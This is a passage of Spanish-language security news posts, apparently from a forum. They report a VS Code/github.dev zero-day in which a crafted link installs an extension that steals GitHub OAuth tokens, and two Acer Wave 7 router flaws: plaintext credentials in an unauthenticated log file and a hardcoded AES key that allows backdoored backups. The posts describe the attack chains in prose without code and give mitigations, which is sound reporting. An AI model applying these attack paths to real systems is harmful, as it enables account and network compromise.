Mientras no exista una corrección oficial, la implementación de controles defensivos como el bloqueo de SMB saliente, la firma SMB obligatoria y la eliminación progresiva de NTLM seguirá siendo la mejor estrategia para reducir la exposición frente a este tipo de amenazas y fortalecer la seguridad de la infraestructura empresarial.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una nueva vulnerabilidad Zero-Day descubierta en Visual Studio Code (VS Code) ha encendido las alarmas en la comunidad de ciberseguridad tras la publicación de un código de explotación funcional que permite a los atacantes robar tokens de autenticación de GitHub. El fallo, que actualmente no cuenta con un parche oficial ni un identificador CVE asignado, podría facilitar el acceso no autorizado a repositorios privados y otros recursos asociados a las cuentas de las víctimas.

El investigador de seguridad Ammar Askar fue quien dio a conocer públicamente tanto los detalles técnicos de la vulnerabilidad como una prueba de concepto (PoC) capaz de demostrar el impacto real del problema. Según explicó, el fallo afecta a la integración entre GitHub y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, la versión web de Visual Studio Code que permite editar repositorios directamente desde el navegador.

La divulgación pública del exploit ha generado preocupación debido a que los atacantes podrían aprovechar esta vulnerabilidad para obtener acceso a información sensible almacenada en repositorios privados, comprometiendo proyectos de desarrollo, código fuente propietario y datos empresariales críticos.

¿Cómo funciona la vulnerabilidad Zero-Day en VS Code?

El fallo se encuentra relacionado con el sistema de comunicación utilizado por las WebViews de Visual Studio Code. Las WebViews son componentes que permiten ejecutar contenido web dentro del entorno del editor y facilitan la interacción entre extensiones y la interfaz principal de la aplicación.

De acuerdo con la investigación de Askar, un atacante puede abusar del mecanismo de intercambio de mensajes entre la WebView y el editor principal para ejecutar código JavaScript malicioso capaz de simular pulsaciones de teclado y realizar acciones automatizadas sin el consentimiento del usuario.

El escenario de ataque comienza cuando una víctima es engañada para hacer clic en un enlace especialmente diseñado. Una vez abierto el enlace, el código malicioso aprovecha la debilidad presente en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para instalar silenciosamente una extensión maliciosa dentro de la sesión del navegador.

Posteriormente, dicha extensión obtiene acceso al token OAuth utilizado por GitHub para autenticar al usuario y permitir la interacción con los repositorios.

El riesgo real: acceso a todos los repositorios privados

Uno de los aspectos más preocupantes de esta vulnerabilidad es el alcance de los permisos asociados al token OAuth robado.

Según explicó el investigador, GitHub envía un token de autenticación a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para permitir que el usuario interactúe con sus repositorios directamente desde la interfaz web de Visual Studio Code.

Sin embargo, el token no está limitado únicamente al repositorio específico desde el que se inició la sesión.

Esto significa que, una vez comprometido, el atacante puede utilizar dicho token para acceder a todos los repositorios privados a los que tenga permisos la víctima.

Entre las acciones potenciales que podrían realizarse destacan:

• Enumerar repositorios privados.
• Acceder al contenido completo del código fuente.
• Descargar proyectos internos.
• Consultar historiales de cambios.
• Obtener información sobre colaboradores y configuraciones.
• Exfiltrar datos confidenciales almacenados en los repositorios.

Para organizaciones que utilizan GitHub como plataforma principal de desarrollo, este escenario representa un riesgo significativo para la propiedad intelectual y la seguridad corporativa.

Publicación del exploit y divulgación responsable

La vulnerabilidad fue revelada públicamente junto con una prueba de concepto funcional, una decisión que ha generado debate dentro de la comunidad de seguridad informática.

Askar afirmó que notificó a GitHub aproximadamente una hora antes de hacer pública la investigación. Sin embargo, aclaró que su intención era realizar una divulgación completa debido a experiencias negativas previas con el proceso de gestión de vulnerabilidades de Microsoft.

Según el investigador, en ocasiones anteriores reportó vulnerabilidades relacionadas con VS Code que, según sus declaraciones, fueron corregidas sin reconocimiento formal y clasificadas como problemas sin impacto en la seguridad.

Esta situación lo llevó a adoptar una postura de divulgación pública inmediata para futuros hallazgos relacionados con Visual Studio Code.

Crecen las críticas al proceso de respuesta de seguridad de Microsoft

La polémica surge en un contexto donde varios investigadores han expresado públicamente su descontento con el funcionamiento del Microsoft Security Response Center (MSRC), el equipo responsable de gestionar reportes de vulnerabilidades en productos de Microsoft.

Durante los últimos meses, diversos fallos Zero-Day han sido revelados por investigadores independientes sin esperar los ciclos tradicionales de divulgación coordinada.

Uno de los casos más conocidos involucra al investigador anónimo conocido como "Nightmare Eclipse", responsable de revelar múltiples vulnerabilidades que afectaban a diferentes componentes del ecosistema Windows.

Entre los fallos divulgados se encuentran:

• BlueHammer.
• RedSun.
• GreenPlasma.
• MiniPlasma.
• YellowKey.
• UnDefender.

Algunos de estos problemas ya han sido vinculados a ataques reales, aumentando la presión sobre Microsoft para acelerar sus procesos de respuesta y corrección.

Microsoft responde a las críticas

Tras la publicación del nuevo Zero-Day de Visual Studio Code, Microsoft emitió una declaración oficial en la que reafirmó su compromiso con la comunidad de investigación en seguridad.

La compañía destacó que valora el trabajo realizado por los investigadores independientes y aseguró que continúa evaluando de manera rápida los problemas reportados para implementar mitigaciones y protecciones lo antes posible.

Asimismo, Microsoft señaló que, aunque los investigadores pueden decidir cuándo y cómo divulgar sus hallazgos, la empresa mantiene equipos especializados preparados para analizar vulnerabilidades, desarrollar correcciones y ofrecer orientación de seguridad a sus clientes.

La declaración busca reducir la tensión generada por las recientes controversias relacionadas con la divulgación de vulnerabilidades y la gestión de reportes por parte del MSRC.

Cómo protegerse mientras no exista un parche oficial

Dado que actualmente no existe una actualización de seguridad disponible para corregir este fallo, los usuarios de Visual Studio Code y GitHub deben adoptar medidas preventivas para minimizar el riesgo de explotación.

La principal recomendación consiste en eliminar las cookies y los datos locales asociados a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login en el navegador.

Para hacerlo, se deben seguir estos pasos:

• Abrir You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login en el navegador.
• Hacer clic en el icono de configuración ubicado junto a la barra de direcciones.
• Acceder a la sección "Cookies y datos del sitio".
• Seleccionar "Gestionar los datos del sitio en el dispositivo".
• Eliminar todos los datos almacenados relacionados con You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Al realizar este procedimiento, GitHub mostrará una advertencia explícita cuando una extensión intente iniciar sesión utilizando la cuenta del usuario, proporcionando una capa adicional de protección frente a intentos de explotación.

Un nuevo recordatorio sobre los riesgos de las extensiones y aplicaciones web

La aparición de este nuevo Zero-Day en Visual Studio Code demuestra una vez más cómo los mecanismos de integración entre aplicaciones web, navegadores y plataformas de desarrollo pueden convertirse en objetivos atractivos para los ciberdelincuentes.

El robo de tokens OAuth representa una amenaza especialmente peligrosa porque permite a los atacantes actuar en nombre de la víctima sin necesidad de conocer contraseñas o superar sistemas de autenticación multifactor.

Mientras Microsoft y GitHub analizan el problema y desarrollan una solución definitiva, las organizaciones y desarrolladores deben extremar las precauciones al interactuar con enlaces externos y revisar cuidadosamente los permisos otorgados a extensiones y aplicaciones conectadas a sus cuentas de GitHub.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Acer ha confirmado la existencia de dos vulnerabilidades Zero-Day de máxima gravedad que afectan a sus routers mesh Wave 7, una situación que podría exponer a miles de usuarios a ataques remotos capaces de comprometer por completo la seguridad de sus redes domésticas y empresariales.

Los fallos de seguridad, identificados como CVE-2026-49200 y CVE-2026-49201, fueron descubiertos y reportados por el investigador de seguridad Gergo Pap. Según el aviso oficial emitido por Acer, ambas vulnerabilidades afectan a los dispositivos Wave 7 que ejecutan la versión de firmware T7c_GBL_1.01.000055 o anteriores.

La gravedad de estos errores radica en que pueden ser explotados por atacantes remotos sin necesidad de autenticación previa, permitiendo desde el robo de credenciales hasta la implantación de accesos persistentes mediante puertas traseras, comprometiendo la integridad y confidencialidad de las comunicaciones de los usuarios.

CVE-2026-49200: exposición de credenciales en texto plano

La primera vulnerabilidad identificada, catalogada como CVE-2026-49200, corresponde a un problema de control de acceso insuficiente que permite a atacantes no autenticados acceder a información altamente sensible almacenada dentro del router.

De acuerdo con la documentación publicada por Acer, el archivo de registro denominado acer_cgi.log puede ser consultado a través de la interfaz web sin requerir autenticación. El problema es especialmente grave porque dicho archivo contiene credenciales almacenadas en texto claro.

Entre los datos expuestos se encuentran:

• Credenciales de acceso al panel web de administración.
• Datos de autenticación para servicios Telnet.
• Información que podría facilitar movimientos laterales dentro de la red.

La presencia de credenciales sin cifrar en archivos accesibles públicamente representa una vulnerabilidad crítica que podría ser explotada para obtener acceso administrativo completo al dispositivo.

Una vez comprometido el router, un atacante podría modificar configuraciones de red, interceptar tráfico, redirigir conexiones, desplegar malware o utilizar el dispositivo como punto de acceso para comprometer otros equipos conectados.

CVE-2026-49201: clave criptográfica codificada permite instalar puertas traseras

La segunda vulnerabilidad, identificada como CVE-2026-49201, presenta un escenario igualmente preocupante.

Según Acer, el componente upload.cgi, encargado de gestionar las copias de seguridad del dispositivo, contiene una clave criptográfica AES codificada de forma estática dentro del firmware.

Este tipo de práctica es considerada una debilidad de seguridad crítica porque permite que un atacante que conozca dicha clave pueda:

• Descifrar archivos de respaldo del sistema.
• Modificar configuraciones internas del router.
• Alterar parámetros de seguridad.
• Reempaquetar y cifrar nuevamente las copias manipuladas.
• Introducir puertas traseras persistentes difíciles de detectar.

En términos prácticos, un ciberdelincuente podría crear una copia de seguridad modificada que incluya mecanismos de acceso ocultos y posteriormente restaurarla en el dispositivo, obteniendo control permanente incluso después de reinicios o cambios superficiales de configuración.

Los expertos advierten que este tipo de vulnerabilidades suelen ser especialmente peligrosas porque facilitan ataques persistentes y difíciles de erradicar, permitiendo que los atacantes mantengan acceso prolongado a la infraestructura comprometida.

Impacto de las vulnerabilidades en la seguridad de la red

Los routers representan uno de los componentes más importantes dentro de cualquier entorno conectado, ya que actúan como punto central de comunicación entre dispositivos locales e Internet.

Cuando un router resulta comprometido, las consecuencias pueden extenderse a toda la red.

Entre los riesgos asociados a estas vulnerabilidades destacan:

Robo de información sensible

Los atacantes podrían interceptar tráfico de red y recopilar información confidencial, incluyendo credenciales, sesiones activas y datos personales.

Secuestro de tráfico

Un ciberdelincuente podría modificar configuraciones DNS para redirigir a los usuarios hacia sitios web maliciosos diseñados para el robo de credenciales o la distribución de malware.

Persistencia avanzada

La vulnerabilidad relacionada con la clave AES codificada facilita la instalación de mecanismos de acceso persistente que pueden permanecer activos durante largos períodos.

Compromiso de dispositivos conectados

Una vez obtenido el control del router, los atacantes podrían utilizarlo como plataforma para lanzar ataques contra ordenadores, smartphones, dispositivos IoT y otros equipos conectados a la misma red.

Acer prepara actualizaciones de seguridad

Aunque actualmente no existen parches públicos disponibles para corregir estas vulnerabilidades, Acer aseguró que ya está trabajando en soluciones de seguridad.

La compañía indicó que las correcciones serán distribuidas mediante futuras actualizaciones de firmware programadas para finales de junio de 2026.

El fabricante recomendó a todos los usuarios mantenerse atentos a los avisos oficiales y aplicar las actualizaciones tan pronto como estén disponibles para minimizar la superficie de ataque.

Cómo actualizar el firmware del router Acer Wave 7

Una vez que Acer publique las correcciones, los usuarios podrán verificar e instalar las actualizaciones siguiendo estos pasos:

• Conectar un ordenador al router Acer Wave 7 mediante Wi-Fi o cable Ethernet.
• Abrir un navegador web.
• Acceder al panel de administración mediante:
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• Iniciar sesión con una cuenta de administrador.
• Dirigirse al apartado Gestión de Sistemas.
• Seleccionar Actualización de firmware.
• Pulsar en Comprobar actualizaciones.
• Instalar la versión más reciente disponible.

Medidas de mitigación recomendadas

Hasta que los parches oficiales sean liberados, Acer recomienda implementar medidas preventivas para reducir el riesgo de explotación.

Las principales recomendaciones incluyen:

• Desactivar la administración remota del router siempre que sea posible.
• Limitar el acceso remoto exclusivamente a direcciones IP de confianza.
• Cambiar periódicamente las credenciales administrativas.
• Supervisar registros de actividad sospechosa.
• Deshabilitar servicios innecesarios como Telnet si el dispositivo lo permite.
• Mantener segmentados los dispositivos críticos dentro de la red.

Un recordatorio de los riesgos asociados a los dispositivos conectados

La aparición de estas vulnerabilidades en los routers Acer Wave 7 vuelve a poner de manifiesto la importancia de la seguridad en los dispositivos de red. Los routers son objetivos frecuentes de los ciberdelincuentes debido a su posición estratégica dentro de las infraestructuras digitales.

La combinación de credenciales expuestas en texto plano y claves criptográficas codificadas representa una amenaza significativa que podría ser aprovechada para comprometer completamente una red doméstica o empresarial.

Mientras Acer finaliza el desarrollo de los parches correspondientes, los usuarios afectados deben adoptar medidas de mitigación inmediatas y mantenerse atentos a las futuras actualizaciones de firmware que corregirán estos dos peligrosos fallos Zero-Day.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login